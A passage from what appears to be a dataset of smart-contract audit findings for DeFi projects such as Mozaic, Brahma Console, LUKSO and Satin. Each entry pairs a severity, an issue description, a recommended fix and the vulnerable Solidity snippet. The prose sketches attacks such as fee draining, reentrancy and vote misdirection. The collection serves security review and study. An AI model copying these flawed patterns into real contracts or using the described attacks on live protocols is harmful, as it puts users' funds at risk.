_stagedBuffer.withdrawAmountPerUser[_withdrawer] + \\n _pendingBuffer.withdrawAmountPerUser[_withdrawer];\\n require(_bookedAmountMLP + _amountMLP <= \\n MozaicLP(mozLP).balanceOf(_withdrawer), \"Withdraw amount > amount MLP\");\\n …\\n emit WithdrawRequestAdded(_withdrawer, _token, chainId, _amountMLP);\\n }\\n```\\n -Removal of Multisig members will corrupt data structuresчmediumчThe Mozaic Multisig (the senate) can remove council members using the TYPE_DEL_OWNER operation:\\n```\\n if(proposals[_proposalId].actionType == TYPE_DEL_OWNER) {\\n (address _owner) = abi.decode(proposals[_proposalId].payload, (address));\\n require(contains(_owner) != 0, \"Invalid owner address\");\\n uint index = contains(_owner);\\n for (uint256 i = index; i < councilMembers.length - 1; i++) {\\n councilMembers[i] = councilMembers[i + 1];\\n }\\n councilMembers.pop();\\n proposals[_proposalId].executed = true;\\n isCouncil[_owner] = false;\\n }\\n```\\n\\nThe code finds the owner's index in the councilMembers array, copies all subsequent members downwards, and deletes the last element. Finally, it deletes the isCouncil[_owner] entry. The issue is actually in the contains() function.\\n```\\n function contains(address _owner) public view returns (uint) {\\n for (uint i = 1; i <= councilMembers.length; i++) {\\n if (councilMembers[i - 1] == _owner) {\\n return i;\\n }\\n }\\n return 0;\\n }\\n```\\n\\nThe function returns the index following the owner's index. Therefore, the intended owner is not deleted from councilMembers, instead the one after it is. The `submitProposal()` and `confirmTransaction()` privileged functions will not be affected by the bug, as they filter by isCouncil. However, the corruption of councilMembers will make deleting the member following the currently deleted owner fail, as deletion relies on finding the member in councilMembers.чFix the `contains()` function to return the correct index of _ownerчч```\\n if(proposals[_proposalId].actionType == TYPE_DEL_OWNER) {\\n (address _owner) = abi.decode(proposals[_proposalId].payload, (address));\\n require(contains(_owner) != 0, \"Invalid owner address\");\\n uint index = contains(_owner);\\n for (uint256 i = index; i < councilMembers.length - 1; i++) {\\n councilMembers[i] = councilMembers[i + 1];\\n }\\n councilMembers.pop();\\n proposals[_proposalId].executed = true;\\n isCouncil[_owner] = false;\\n }\\n```\\n -Attacker could abuse victim's vote to pass their own proposalчmediumчProposals are created using submitProposal():\\n```\\n function submitProposal(uint8 _actionType, bytes memory _payload) public onlyCouncil {\\n uint256 proposalId = proposalCount;\\n proposals[proposalId] = Proposal(msg.sender,_actionType, \\n _payload, 0, false);\\n proposalCount += 1;\\n emit ProposalSubmitted(proposalId, msg.sender);\\n }\\n```\\n\\nAfter submission, council members approve them by calling confirmTransaction():\\n```\\n function confirmTransaction(uint256 _proposalId) public onlyCouncil \\n notConfirmed(_proposalId) {\\n confirmations[_proposalId][msg.sender] = true;\\n proposals[_proposalId].confirmation += 1;\\n emit Confirmation(_proposalId, msg.sender);\\n }\\n```\\n\\nNotably, the _proposalId passed to `confirmTransaction()` is simply the proposalCount at time of submission. This design allows the following scenario to occur:\\nUser A submits proposal P1\\nUser B is interested in the proposal and confirms it\\nAttacker submits proposal P2\\nA blockchain re-org occurs. Submission of P1 is dropped in place of P2.\\nUser B's confirmation is applied on top of the re-orged blockchain. Attacker gets their vote. We've seen very large re-orgs in top blockchains such as Polygon, so this threat remains a possibility to be aware of.чCalculate proposalId as a hash of the proposal properties. This way, votes cannot be misdirected.чч```\\n function submitProposal(uint8 _actionType, bytes memory _payload) public onlyCouncil {\\n uint256 proposalId = proposalCount;\\n proposals[proposalId] = Proposal(msg.sender,_actionType, \\n _payload, 0, false);\\n proposalCount += 1;\\n emit ProposalSubmitted(proposalId, msg.sender);\\n }\\n```\\n -MozToken will have a much larger fixed supply than intended.чmediumчMozToken is planned to be deployed on all supported chains. Its total supply will be 1B. However, its constructor will mint 1B tokens on each deployment.\\n```\\n constructor( address _layerZeroEndpoint, uint8 _sharedDecimals\\n ) OFTV2(\"Mozaic Token\", \"MOZ\", _sharedDecimals, _layerZeroEndpoint) {\\n _mint(msg.sender, 1000000000 * 10 ** _sharedDecimals);\\n isAdmin[msg.sender] = true;\\n }\\n```\\nчPass the minted supply as a parameter. Only on the main chain, mint 1B tokens.чч```\\n constructor( address _layerZeroEndpoint, uint8 _sharedDecimals\\n ) OFTV2(\"Mozaic Token\", \"MOZ\", _sharedDecimals, _layerZeroEndpoint) {\\n _mint(msg.sender, 1000000000 * 10 ** _sharedDecimals);\\n isAdmin[msg.sender] = true;\\n }\\n```\\n -Theoretical reentrancy attack when TYPE_MINT_BURN proposals are executedчlowчThe senate can pass a proposal to mint or burn tokens.\\n```\\n if(proposals[_proposalId].actionType == TYPE_MINT_BURN) {\\n (address _token, address _to, uint256 _amount, bool _flag) = \\n abi.decode(proposals[_proposalId].payload, (address, address, uint256, bool));\\n if(_flag) {\\n IXMozToken(_token).mint(_amount, _to);\\n } else {\\n IXMozToken(_token).burn(_amount, _to);\\n }\\n proposals[_proposalId].executed = true;\\n }\\n```\\n\\nNote that the proposal is only marked as executed at the end of execution, but execution is checked at the start of the function.\\n```\\n function execute(uint256 _proposalId) public onlyCouncil {\\n require(proposals[_proposalId].executed == false, \"Error: \\n Proposal already executed.\");\\n require(proposals[_proposalId].confirmation >= threshold, \"Error: Not enough confirmations.\");\\n```\\n\\nInteraction with tokens should generally be assumed to grant arbitrary call execution to users. If the mint or `burn()` calls call `execute()` again, the proposal will be executed twice, resulting in double the amount minted or burned. Specifically for XMoz, it is not anticipated to yield execution to the to address, so the threat remains theoretical.чFollow the Check-Effects-Interactions design pattern, mark the function as executed at the start.чч```\\n if(proposals[_proposalId].actionType == TYPE_MINT_BURN) {\\n (address _token, address _to, uint256 _amount, bool _flag) = \\n abi.decode(proposals[_proposalId].payload, (address, address, uint256, bool));\\n if(_flag) {\\n IXMozToken(_token).mint(_amount, _to);\\n } else {\\n IXMozToken(_token).burn(_amount, _to);\\n }\\n proposals[_proposalId].executed = true;\\n }\\n```\\n -XMozToken permits transfers from non-whitelisted addressesчlowчThe XMozToken is documented to forbid transfers except from whitelisted addresses or mints.\\n```\\n /**\\n * @dev Hook override to forbid transfers except from whitelisted \\n addresses and minting\\n */\\n function _beforeTokenTransfer(address from, address to, uint256 \\n /*amount*/) internal view override {\\n require(from == address(0) || _transferWhitelist.contains(from) \\n || _transferWhitelist.contains(to), \"transfer: not allowed\");\\n }\\n```\\n\\nHowever, as can be seen, non-whitelisted users can still transfer tokens, so long as it is to whitelisted destinations.чRemove the additional check in `_beforeTokenTransfer()`, or update the documentation accordingly.чч```\\n /**\\n * @dev Hook override to forbid transfers except from whitelisted \\n addresses and minting\\n */\\n function _beforeTokenTransfer(address from, address to, uint256 \\n /*amount*/) internal view override {\\n require(from == address(0) || _transferWhitelist.contains(from) \\n || _transferWhitelist.contains(to), \"transfer: not allowed\");\\n }\\n```\\n -XMozToken cannot be added to its own whitelistчlowчBy design, XMozToken should always be in the whitelist. However, `updateTransferWhitelist()` implementation forbids both removal and insertion of XMozToken to the whitelist.\\n```\\n function updateTransferWhitelist(address account, bool add) external onlyMultiSigAdmin {\\n require(account != address(this), \"updateTransferWhitelist: \\n Cannot remove xMoz from whitelist\");\\n if(add) _transferWhitelist.add(account);\\n else _transferWhitelist.remove(account);\\n emit SetTransferWhitelist(account, add);\\n }\\n```\\nчMove the require statement into the else clause.чч```\\n function updateTransferWhitelist(address account, bool add) external onlyMultiSigAdmin {\\n require(account != address(this), \"updateTransferWhitelist: \\n Cannot remove xMoz from whitelist\");\\n if(add) _transferWhitelist.add(account);\\n else _transferWhitelist.remove(account);\\n emit SetTransferWhitelist(account, add);\\n }\\n```\\n -User fee token balance can be drained in a single operation by a malicious botчhighчIn `_buildFeeExecutable()`, BrahRouter calculates the total fee charged to the wallet. It uses tx. gas price to get the gas price specified by the bot.\\n```\\n if (feeToken == ETH) \\n {uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * tx.gasprice;\\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {uint256 totalFee = (gasUsed + GAS_OVERHEAD_ERC20) * tx.gasprice;\\n // Convert fee amount value in fee tokenuint256 feeToCollect =PriceFeedManager(_addressProvider.priceFeedManager()).getTokenXPriceInY(totalFee, ETH, feeToken);\\n feeToCollect = _applyMultiplier(feeToCollect);\\n return (feeToCollect, recipient, TokenTransfer._erc20TransferExec(feeToken, recipient, feeToCollect));}\\n```\\nчUse a gas oracle or a capped priority fee to ensure an inflated gas price down not harm the user.чч```\\n if (feeToken == ETH) \\n {uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * tx.gasprice;\\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {uint256 totalFee = (gasUsed + GAS_OVERHEAD_ERC20) * tx.gasprice;\\n // Convert fee amount value in fee tokenuint256 feeToCollect =PriceFeedManager(_addressProvider.priceFeedManager()).getTokenXPriceInY(totalFee, ETH, feeToken);\\n feeToCollect = _applyMultiplier(feeToCollect);\\n return (feeToCollect, recipient, TokenTransfer._erc20TransferExec(feeToken, recipient, feeToCollect));}\\n```\\n -Users can drain Gelato deposit at little costчhighчIn Console automation, fees are collected via the `claimExecutionFees()` modifier:\\n```\\n modifier claimExecutionFees(address _wallet) {\\n uint256 startGas = gasleft();\\n _;\\n if (feeMultiplier > 0) {\\n address feeToken = FeePayer._feeToken(_wallet);\\n uint256 gasUsed = startGas -gasleft();\\n (uint256 feeAmount, address recipient, Types.Executable memory feeTransferTxn)=FeePayer._buildFeeExecutable\\n (gasUsed, feeToken);\\n emit FeeClaimed(_wallet, feeToken, feeAmount);\\n if (feeToken != ETH) {uint256 initialBalance = IERC20(feeToken).balanceOf(recipient);_\\n executeSafeERC20Transfer(_wallet, feeTransferTxn);\\n if (IERC20(feeToken).balanceOf(recipient) -initialBalance < feeAmount){\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);}\\n } else {\\n uint256 initialBalance = recipient.balance;\\n Executor._executeOnWallet(_wallet, feeTransferTxn);\\n if (recipient.balance -initialBalance < feeAmount) {\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);\\n }\\n }\\n }\\n }\\n```\\nчWhen calculating fees in buildFeeExecutable(), there are assumptions about the gas cost of an ERC20 transfer and a native transfer.\\n```\\n // Keeper network overhead -150k\\n uint256 internal constant GAS_OVERHEAD_NATIVE = 150_000 + 40_000;\\n uint256 internal constant GAS_OVERHEAD_ERC20 = 150_000 + 90_000;\\n```\\n\\nA good fix would be to check the actual gas usage and require it to be under the hard cap.Team responseAdded a gas check for this attack.Mitigation reviewApplied fix has been applied.чч```\\n modifier claimExecutionFees(address _wallet) {\\n uint256 startGas = gasleft();\\n _;\\n if (feeMultiplier > 0) {\\n address feeToken = FeePayer._feeToken(_wallet);\\n uint256 gasUsed = startGas -gasleft();\\n (uint256 feeAmount, address recipient, Types.Executable memory feeTransferTxn)=FeePayer._buildFeeExecutable\\n (gasUsed, feeToken);\\n emit FeeClaimed(_wallet, feeToken, feeAmount);\\n if (feeToken != ETH) {uint256 initialBalance = IERC20(feeToken).balanceOf(recipient);_\\n executeSafeERC20Transfer(_wallet, feeTransferTxn);\\n if (IERC20(feeToken).balanceOf(recipient) -initialBalance < feeAmount){\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);}\\n } else {\\n uint256 initialBalance = recipient.balance;\\n Executor._executeOnWallet(_wallet, feeTransferTxn);\\n if (recipient.balance -initialBalance < feeAmount) {\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);\\n }\\n }\\n }\\n }\\n```\\n -Attackers can drain users over time by donating negligible ERC20 amountчhighчIn the Console automation model, a strategy shall keep executing until its trigger check fails. For DCA strategies, the swapping trigger is defined as:\\n```\\n function canInitSwap(address subAccount, address inputToken, uint256 interval, uint256 lastSwap)\\n external view returns (bool)\\n {\\n if (hasZeroBalance(subAccount, inputToken)) \\n { return false;\\n }\\n return ((lastSwap + interval) < block.timestamp);\\n }\\n```\\nчDefine a DUST_AMOUNT, below that amount exit is allowed, while above that amount swap execution is allowed. User should only stand to gain from another party donating ERC20 tokens to their account.чч```\\n function canInitSwap(address subAccount, address inputToken, uint256 interval, uint256 lastSwap)\\n external view returns (bool)\\n {\\n if (hasZeroBalance(subAccount, inputToken)) \\n { return false;\\n }\\n return ((lastSwap + interval) < block.timestamp);\\n }\\n```\\n -When FeePayer is subsidizing, users can steal gasчmediumч```\\nThe feeMultiplier enables the admin to subsidize or upcharge for the automation service.\\n/**\\n⦁ @notice feeMultiplier represents the total fee to be charged on the transaction\\n⦁ Is set to 100% by default\\n⦁ @dev In case feeMultiplier is less than BASE_BPS, fees charged will be less than 100%,\\n⦁ subsidizing the transaction\\n⦁ In case feeMultiplier is greater than BASE_BPS, fees charged will be greater than 100%,\\n⦁ charging the user for the transaction\\n*/ \\n uint16 public feeMultiplier = 10_000;\\n // The normal fee is calculated and then processed by the multiplier.\\n if (feeToken == ETH) {\\n uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * tx.gasprice; \\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {\\n```\\nчThe root cause is that the gasUsed amount is subsidized as well as GAS_OVERHEAD_NATIVE, which is the gas reserved for the delivery from Gelato executors. By subsidizing only the Gelato gas portion, users will not gain from gas minting attacks, while the intention of improving user experience is maintained.чч```\\nThe feeMultiplier enables the admin to subsidize or upcharge for the automation service.\\n/**\\n⦁ @notice feeMultiplier represents the total fee to be charged on the transaction\\n⦁ Is set to 100% by default\\n⦁ @dev In case feeMultiplier is less than BASE_BPS, fees charged will be less than 100%,\\n⦁ subsidizing the transaction\\n⦁ In case feeMultiplier is greater than BASE_BPS, fees charged will be greater than 100%,\\n⦁ charging the user for the transaction\\n*/ \\n uint16 public feeMultiplier = 10_000;\\n // The normal fee is calculated and then processed by the multiplier.\\n if (feeToken == ETH) {\\n uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * tx.gasprice; \\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {\\n```\\n -Strategy actions could be executed out of order due to lack of reentrancy guardчmediumчThe Execute module performs automation of the fetched Executable array on wallet subaccounts.\\n```\\n function _executeAutomation( address _wallet, address _subAccount, address _strategy,\\n Types.Executable[] memory _actionExecs ) internal {\\n uint256 actionLen = _actionExecs.length;\\n if (actionLen == 0) {\\n revert InvalidActions();\\n } else {\\n uint256 idx = 0;\\n do {\\n _executeOnSubAccount(_wallet, _subAccount, _strategy,\\n _actionExecs[idx]);\\n unchecked {\\n ++idx;\\n }\\n } while (idx < actionLen);\\n }\\n }\\n```\\nчAdd a reentrancy guard for `executeAutomationViaBot()` and `executeTrustedAutomation()`.чч```\\n function _executeAutomation( address _wallet, address _subAccount, address _strategy,\\n Types.Executable[] memory _actionExecs ) internal {\\n uint256 actionLen = _actionExecs.length;\\n if (actionLen == 0) {\\n revert InvalidActions();\\n } else {\\n uint256 idx = 0;\\n do {\\n _executeOnSubAccount(_wallet, _subAccount, _strategy,\\n _actionExecs[idx]);\\n unchecked {\\n ++idx;\\n }\\n } while (idx < actionLen);\\n }\\n }\\n```\\n -Anyone can make creating strategies extremely expensive for the userчmediumчIn Console architecture, users can deploy spare subaccounts (Gnosis Safes) so that when they will subscribe to a strategy most of the gas spending would have been spent at a low-gas phase.\\n```\\n function deploySpareSubAccount(address _wallet) external { address subAccount =\\n SafeDeployer(addressProvider.safeDeployer()).deploySubAccount(_wallet);\\n subAccountToWalletMap[subAccount] = _wallet; walletToSubAccountMap[_wallet].push(subAccount);\\n // No need to update subAccountStatus as it is already set to false\\n emit SubAccountAllocated(_wallet, subAccount);\\n }\\n```\\n\\nImpact The issue is that anyone can call the deploy function and specify another user's wallet. While on the surface that sounds like donating gas costs, in practice this functionality can make operating with strategies prohibitively expensive. When users will subscribe to strategies, the StrategyRegistry will request a subaccount using this function:\\n```\\n function requestSubAccount(address _wallet) external returns (address) {\\n if (msg.sender != subscriptionRegistry) \\n revert OnlySubscriptionRegistryCallable();\\n // Try to find a subAccount which already exists\\n address[] memory subAccountList = walletToSubAccountMap[_wallet];\\n```\\n\\nAt this point, the entire subaccount array will be copied from storage to memory. Therefore, attackers can fill the array with hundreds of elements at a low-gas time and make creation of strategies very difficult.чLimit the amount of spare subaccount to something reasonable, like 10 Team Response: Removing the spare subaccount deployment Mitigation review: Attack surface has been removed.чч```\\n function deploySpareSubAccount(address _wallet) external { address subAccount =\\n SafeDeployer(addressProvider.safeDeployer()).deploySubAccount(_wallet);\\n subAccountToWalletMap[subAccount] = _wallet; walletToSubAccountMap[_wallet].push(subAccount);\\n // No need to update subAccountStatus as it is already set to false\\n emit SubAccountAllocated(_wallet, subAccount);\\n }\\n```\\n -DCA Strategies build orders that may not be executable, wasting feesчmediumчIn `_buildInitiateSwapExecutable()`, DCA strategies determine the swap parameters for the CoW Swap. The code has recently been refactored so that there may be more than one active order simultaneously. The issue is that the function assumes the user's entire ERC20 balance to be available for the order being built.\\n```\\n // Check if enough balance present to swap, else swap entire balance\\n uint256 amountIn = (inputTokenBalance < params.amountToSwap) ? \\n inputTokenBalance : params.amountToSwap;\\n```\\n\\nImpact This is a problem because if the previous order will be executed before the current order, there may not be enough funds to pull from the user to execute the swap. As a result, transaction execution fees are wasted.чEnsure only one swap can be in-flight at a time, or deduct the in-flight swap amounts from the current balance.чч```\\n // Check if enough balance present to swap, else swap entire balance\\n uint256 amountIn = (inputTokenBalance < params.amountToSwap) ? \\n inputTokenBalance : params.amountToSwap;\\n```\\n -User will lose all Console functionality when upgrading their wallet and an upgrade target has not been set upчmediumчConsole supports upgrading of the manager wallet using the `upgradeWalletType()` function.\\n```\\n function upgradeWalletType() external {\\n if (!isWallet(msg.sender)) \\n revert WalletDoesntExist(msg.sender); uint8 fromWalletType = _walletDataMap[msg.sender].walletType;\\n _setWalletType(msg.sender, _upgradablePaths[fromWalletType]);\\n emit WalletUpgraded(msg.sender, fromWalletType,\\n _upgradablePaths[fromWalletType]);\\n }\\n```\\n\\nNote that upgradablePaths are set by governance. There is a lack of check that the upgradable path is defined before performing the upgrade.\\n```\\n function _setWalletType(address _wallet, uint8 _walletType) private {\\n _walletDataMap[_wallet].walletType = _walletType;\\n }\\n```\\n\\nIf _upgradablePaths[fromWalletType] is zero (uninitialized), the user's wallet type shall become zero too. However, zero is an invalid value, as defined by the isWallet() view function:\\n```\\n function isWallet(address _wallet) public view returns (bool) \\n { WalletData memory walletData = _walletDataMap[_wallet];\\n if (walletData.walletType == 0 || walletData.feeToken == address(0)){\\n return false;\\n }\\n return true;\\n }\\n```\\n\\nImpact As a result, most of the functionality of Console is permanently broken when users upgrade their wallet when an upgrade path isn't set. They can salvage their funds if it is a Safe account, as they can still execute on it directly.чWhen settings a new wallet type, make sure the new type is not zero.чч```\\n function upgradeWalletType() external {\\n if (!isWallet(msg.sender)) \\n revert WalletDoesntExist(msg.sender); uint8 fromWalletType = _walletDataMap[msg.sender].walletType;\\n _setWalletType(msg.sender, _upgradablePaths[fromWalletType]);\\n emit WalletUpgraded(msg.sender, fromWalletType,\\n _upgradablePaths[fromWalletType]);\\n }\\n```\\n -Rounding error causes an additional iteration of DCA strategiesчlowчBoth CoW strategies receive an interval and total amountIn of tokens to swap. They calculate the amount per iteration as below:\\n```\\n Types.TokenRequest[] memory tokens = new Types.TokenRequest[](1); \\n tokens[0] = Types.TokenRequest({token: inputToken, amount: amountIn});\\n amountIn = amountIn / iterations;\\n StrategyParams memory params = StrategyParams({ tokenIn: inputToken,\\n tokenOut: outputToken, amountToSwap: amountIn, interval: interval, remitToOwner: remitToOwner\\n });\\n```\\nчChange the amount requested from the management wallet to amountIn / iterations * iterations.чч```\\n Types.TokenRequest[] memory tokens = new Types.TokenRequest[](1); \\n tokens[0] = Types.TokenRequest({token: inputToken, amount: amountIn});\\n amountIn = amountIn / iterations;\\n StrategyParams memory params = StrategyParams({ tokenIn: inputToken,\\n tokenOut: outputToken, amountToSwap: amountIn, interval: interval, remitToOwner: remitToOwner\\n });\\n```\\n -Fee mismatch between contracts can make strategies unusableчlowчIn CoW Swap strategies, fee is set in the strategy contracts and then passed to `initiateSwap()`. It is built in _buildInitiateSwapExecutable():\\n```\\n // Generate executable to initiate swap on DCACoWAutomation return Types.Executable({\\n callType: Types.CallType.DELEGATECALL, target: dcaCoWAutomation,\\n value: 0,\\n data: abi.encodeCall( DCACoWAutomation.initiateSwap,\\n (params.tokenIn, params.tokenOut, swapRecipient, amountIn, minAmountOut, swapFee)\\n )\\n });\\n```\\n\\nThere is a mismatch between the constraints around fees between the strategy contracts and the `initiateSwap()` function:\\n```\\n function setSwapFee(uint256 _swapFee) external {\\n _onlyGov();\\n if (_swapFee > 10_000) { revert InvalidSlippage();\\n }\\n swapFee = _swapFee;\\n }\\n if (feeBps > 0) {\\n if (feeBps > 1_000) revert FeeTooHigh();\\n amountIn = amountToSwap * (MAX_BPS - feeBps) / MAX_BPS;\\n```\\nчEnforce the same constraints on the fee percentage in both contracts, or remove the check from one of them as part of a simplified security model.чч```\\n // Generate executable to initiate swap on DCACoWAutomation return Types.Executable({\\n callType: Types.CallType.DELEGATECALL, target: dcaCoWAutomation,\\n value: 0,\\n data: abi.encodeCall( DCACoWAutomation.initiateSwap,\\n (params.tokenIn, params.tokenOut, swapRecipient, amountIn, minAmountOut, swapFee)\\n )\\n });\\n```\\n -Reentrancy protection can likely be bypassedчhighчThe KeyManager offers reentrancy protection for interactions with the associated account. Through the LSP20 callbacks or through the `execute()` calls, it will call `_nonReentrantBefore()` before execution, and `_nonReentrantAfter()` post-execution. The latter will always reset the flag signaling entry.\\n```\\n function _nonReentrantAfter() internal virtual {\\n // By storing the original value once again, a refund is triggered \\n (see // https://eips.ethereum.org/EIPS/eip-2200)\\n _reentrancyStatus = false;\\n }\\n```\\n\\nAn attacker can abuse it to reenter provided that there exists some third-party contract with REENTRANCY_PERMISSION that performs some interaction with the contract. The attacker would trigger the third-party code path, which will clear the reentrancy status, and enable attacker to reenter. This could potentially be chained several times. Breaking the reentrancy assumption would make code that assumes such flows to be impossible to now be vulnerable.чIn `_nonReentrantAfter()`, the flag should be returned to the original value before reentry, rather than always setting it to false.чч```\\n function _nonReentrantAfter() internal virtual {\\n // By storing the original value once again, a refund is triggered \\n (see // https://eips.ethereum.org/EIPS/eip-2200)\\n _reentrancyStatus = false;\\n }\\n```\\n -LSP20 verification library deviates from spec and will accept fail valuesчmediumчThe functions `lsp20VerifyCall()` and `lsp20VerifyCallResult()` are called to validate the owner accepts some account interaction. The specification states they must return a specific 4 byte magic value. However, the implementation will accept any byte array that starts with the required magic value.\\n```\\n function _verifyCall(address logicVerifier) internal virtual returns (bool verifyAfter) {\\n (bool success, bytes memory returnedData) = logicVerifier.call(\\n abi.encodeWithSelector(ILSP20.lsp20VerifyCall.selector, msg.sender, msg.value, msg.data)\\n );\\n if (!success) _revert(false, returnedData);\\n if (returnedData.length < 32) revert \\n LSP20InvalidMagicValue(false, returnedData);\\n bytes32 magicValue = abi.decode(returnedData, (bytes32));\\n if (bytes3(magicValue) != \\n bytes3(ILSP20.lsp20VerifyCall.selector))\\n revert LSP20InvalidMagicValue(false, returnedData);\\n return bytes1(magicValue[3]) == 0x01 ? true : false;\\n }\\n```\\n\\nTherefore, implementations of the above functions which intend to signal failure status may be accepted by the verification wrapper above.чVerify that the return data length is 32 bytes (the 4 bytes are extended by the compiler), and that all other bytes are zero.чч```\\n function _verifyCall(address logicVerifier) internal virtual returns (bool verifyAfter) {\\n (bool success, bytes memory returnedData) = logicVerifier.call(\\n abi.encodeWithSelector(ILSP20.lsp20VerifyCall.selector, msg.sender, msg.value, msg.data)\\n );\\n if (!success) _revert(false, returnedData);\\n if (returnedData.length < 32) revert \\n LSP20InvalidMagicValue(false, returnedData);\\n bytes32 magicValue = abi.decode(returnedData, (bytes32));\\n if (bytes3(magicValue) != \\n bytes3(ILSP20.lsp20VerifyCall.selector))\\n revert LSP20InvalidMagicValue(false, returnedData);\\n return bytes1(magicValue[3]) == 0x01 ? true : false;\\n }\\n```\\n -Deviation from spec will result in dislocation of receiver delegateчmediumчThe LSP0 `universalReceiver()` function looks up the receiver delegate by crafting a mapping key type.\\n```\\n bytes32 lsp1typeIdDelegateKey = LSP2Utils.generateMappingKey(\\n _LSP1_UNIVERSAL_RECEIVER_DELEGATE_PREFIX, bytes20(typeId));\\n```\\n\\nMapping keys are constructed of a 10-byte prefix, 2 zero bytes and a 20-byte suffix. However, followers of the specification will use an incorrect suffix. The docs do not discuss the trimming of bytes32 into a bytes20 type. The mismatch may cause various harmful scenarios when interacting with the delegate not using the reference implementation.чDocument the trimming action in the LSP0 specification.чч```\\n bytes32 lsp1typeIdDelegateKey = LSP2Utils.generateMappingKey(\\n _LSP1_UNIVERSAL_RECEIVER_DELEGATE_PREFIX, bytes20(typeId));\\n```\\n -KeyManager ERC165 does not support LSP20чmediumчLSP6KeyManager supports LSP20 call verification. However, in `supportInterface()` it does not return the LSP20 interfaceId.\\n```\\n function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {\\n return\\n interfaceId == _INTERFACEID_LSP6 || interfaceId == _INTERFACEID_ERC1271 ||\\n super.supportsInterface(interfaceId);\\n }\\n```\\n\\nAs a result, clients which correctly check for support of LSP20 methods will not operate with the KeyManager implementation.чInsert another supported interfaceId under `supportsInterface()`.чч```\\n function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {\\n return\\n interfaceId == _INTERFACEID_LSP6 || interfaceId == _INTERFACEID_ERC1271 ||\\n super.supportsInterface(interfaceId);\\n }\\n```\\n -LSP0 ownership functions deviate from specification and reject native tokensчlowчThe LSP specifications define the following functions for LSP0:\\n```\\n function transferOwnership(address newPendingOwner) external payable;\\n function renounceOwnership() external payable;\\n```\\n\\nHowever, their implementations are not payable.\\n```\\n function transferOwnership(address newOwner) public virtual\\n override(LSP14Ownable2Step, OwnableUnset)\\n {\\n```\\n\\n```\\n function renounceOwnership() public virtual override(LSP14Ownable2Step, OwnableUnset) {\\n address _owner = owner();\\n```\\n\\nThis may break interoperation between conforming and non-confirming contracts.чRemove the payable keyword in the specification for the above functions, or make the implementations payableчч```\\n function transferOwnership(address newPendingOwner) external payable;\\n function renounceOwnership() external payable;\\n```\\n -Transfers of vaults from an invalid source are not treated correctly by receiver delegateчlowчIn the universalReceiver() function, if the notifying contract does not support LSP9, yet the typeID corresponds to an LSP9 transfer, the function will return instead of reverting.\\n```\\n if (\\n mapPrefix == _LSP10_VAULTS_MAP_KEY_PREFIX && notifier.code.length > 0 &&\\n !notifier.supportsERC165InterfaceUnchecked(_INTERFACEID_LSP9)\\n ) {\\n return \"LSP1: not an LSP9Vault ownership transfer\";\\n }\\n```\\nчRevert when dealing with transfers that cannot be valid.чч```\\n if (\\n mapPrefix == _LSP10_VAULTS_MAP_KEY_PREFIX && notifier.code.length > 0 &&\\n !notifier.supportsERC165InterfaceUnchecked(_INTERFACEID_LSP9)\\n ) {\\n return \"LSP1: not an LSP9Vault ownership transfer\";\\n }\\n```\\n -Relayer can choose amount of gas for delivery of messageчlowчLSP6 supports relaying of calls using a supplied signature. The encoded message is defined as:\\n```\\n bytes memory encodedMessage = abi.encodePacked( LSP6_VERSION,\\n block.chainid,\\n nonce,\\n msgValue,\\n payload\\n );\\n```\\n\\nThe message doesn't include a gas parameter, which means the relayer can specify any gas amount. If the provided gas is insufficient, the entire transaction will revert. However, if the called contract exhibits different behavior depending on the supplied gas, a relayer (attacker) has control over that behavior.чSigned message should include the gas amount passed. Care should be taken to verify there is enough gas in the current state for the gas amount not to be truncated due to the 63/64 rule.чч```\\n bytes memory encodedMessage = abi.encodePacked( LSP6_VERSION,\\n block.chainid,\\n nonce,\\n msgValue,\\n payload\\n );\\n```\\n -_calculateClaim() does not distribute boost emissions correctlyчhighчThe function `_calculateClaim()` is responsible for the calculations of the amount of emissions a specific veSatin is entitled to claim. The idea is to distribute emissions only to veSatin tokens locked for more than minLockDurationForReward and only for the extra time the veSatin is locked for on top of minLockDurationForReward. As an example, if minLockDurationForReward is set to 6 months a veSatin locked for 7 months would receive emissions for 1 month and a veSatin locked for 5 months would receive no emissions at all. To do so the following code is executed in a loop, where every loop calculates the amount of emissions the veSatin accumulated during a specific week, in chronological order:\\n```\\n if ((lockEndTime - oldUserPoint.ts) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nThe code distributes the rewards if the elapsed time between lockEndTime (the locking end timestamp) and oldUserPoint.ts is bigger than minLockDurationForReward. However, oldUserPoint.ts is the timestamp of the last user action on a veSatin, for example depositing LP by calling `increaseAmount()`. As an example, a user that locks his veSatin and does nothing else will receive rewards for the whole locking duration. In contrast, a user that performs one action a week would only receive rewards for the locking duration minus minLockDurationForRewardчThe variable weekCursor should be used instead of oldUserPoint.ts in the if condition:\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n```\\nчч```\\n if ((lockEndTime - oldUserPoint.ts) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n -Users will be unable to claim emissions from veSatin tokens if they withdraw it or merge itчhighчThe function `_calculateClaim()` uses the variable lockEndTime when checking if a veSatin is entitled to emissions for a particular week (code with mitigation from TRST-H-1):\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nHowever 